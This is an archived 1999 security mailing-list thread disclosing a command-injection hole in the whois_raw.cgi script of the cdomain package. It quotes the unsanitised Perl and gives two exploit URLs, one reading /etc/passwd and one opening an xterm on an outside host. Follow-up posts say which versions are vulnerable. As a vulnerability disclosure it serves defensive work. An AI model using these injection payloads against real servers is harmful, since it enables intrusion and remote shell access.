[ http://www.rootshell.com/ ]

Date: Tue, 1 Jun 1999 00:34:51 +0200
From: Salvatore Sanfilippo -antirez- <md5330@MCLINK.IT>
Subject: whois_raw.cgi problem

Hi,

        sorry if this has already been known.

        There is a problem in whois_raw.cgi, called from
        whois.cgi. whois_raw.cgi is part of cdomain v1.0.
        I don't know if new versions are vulnerable.

#!/usr/bin/perl
#
# whois_raw.cgi  Written by J. Allen Hatch (zone@berkshire.net)
# 04/17/97
#
# This script is part of the cdomain v1.0 package which is available at:
#       http://www.your-site.com/~zone/whois.html

...

require ("/usr/lib/perl5/cgi-lib.pl");

...

$fqdn = $in{'fqdn'};
# Fetch the root name and concatenate
# Fire off whois
if ($in{'root'} eq "it") {
        @result=`$whois_cmd_it $fqdn`;
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
        @result="Dettagli non disponibili per il dominio richiesto.";
} else {
        @result=`$whois_cmd $fqdn`;
}

...


        The exploit is banal and well known problem:

http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd

http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

bye,
antirez

--
Salvatore Sanfilippo antirez | md5330@mclink.it | antirez@alicom.com
try hping: http://www.kyuzz.org/antirez           antirez@seclab.com
'se la barca non ce l'hai dove uzba te ne vai?
 se la barca te la ruba, preo.'          (M. Abruscato & O. Carmeci)


----------------------------------------------------------------------------

Date: Wed, 2 Jun 1999 00:16:42 +0200
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
Subject: Re: whois_raw.cgi problem

On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
> Hi,
>
>       sorry if this has already been known.
>
>       There is a problem in whois_raw.cgi, called from
>       whois.cgi. whois_raw.cgi is part of cdomain v1.0.
>       I don't know if new versions are vulnerable.

Version 2.0 is just as vulnerable.

The commercial version (the one that runs on NT too :) is _not_ vulnerable
since it does it's own socket thing instead of starting 'whois'.

I've known of this bug in cdomain for about 6 months but never got around
to writing up an advisory...

Greetz, Peter
--
| 'He broke my heart,    |                              Peter van Dijk |
     I broke his neck'   |                     peter@attic.vuurwerk.nl |
   nognikz - As the sun  |        Hardbeat@ircnet - #cistron/#linux.nl |
                         | Hardbeat@undernet - #groningen/#kinkfm/#vdh |

----------------------------------------------------------------------------

Date: Wed, 2 Jun 1999 01:06:22 +0200
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
Subject: Re: whois_raw.cgi problem

On Wed, Jun 02, 1999 at 12:16:42AM +0200, Peter van Dijk wrote:
> On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
> > Hi,
> >
> >     sorry if this has already been known.
> >
> >     There is a problem in whois_raw.cgi, called from
> >     whois.cgi. whois_raw.cgi is part of cdomain v1.0.
> >     I don't know if new versions are vulnerable.
>
> Version 2.0 is just as vulnerable.
>
> The commercial version (the one that runs on NT too :) is _not_ vulnerable
> since it does it's own socket thing instead of starting 'whois'.
>
> I've known of this bug in cdomain for about 6 months but never got around
> to writing up an advisory...

To elaborate this a bit further: cdomain-free 2.4 and lower are
_vulnerable_. cdomain-free 2.5 and all commercial cdomain versions I've
seen are _not_ vulnerable, because they connect to the whois servers
themselves.

cdomain-free is available for download at www.cdomain.com.

Greetz, Peter
--
| 'He broke my heart,    |                              Peter van Dijk |
     I broke his neck'   |                     peter@attic.vuurwerk.nl |
   nognikz - As the sun  |        Hardbeat@ircnet - #cistron/#linux.nl |
                         | Hardbeat@undernet - #groningen/#kinkfm/#vdh |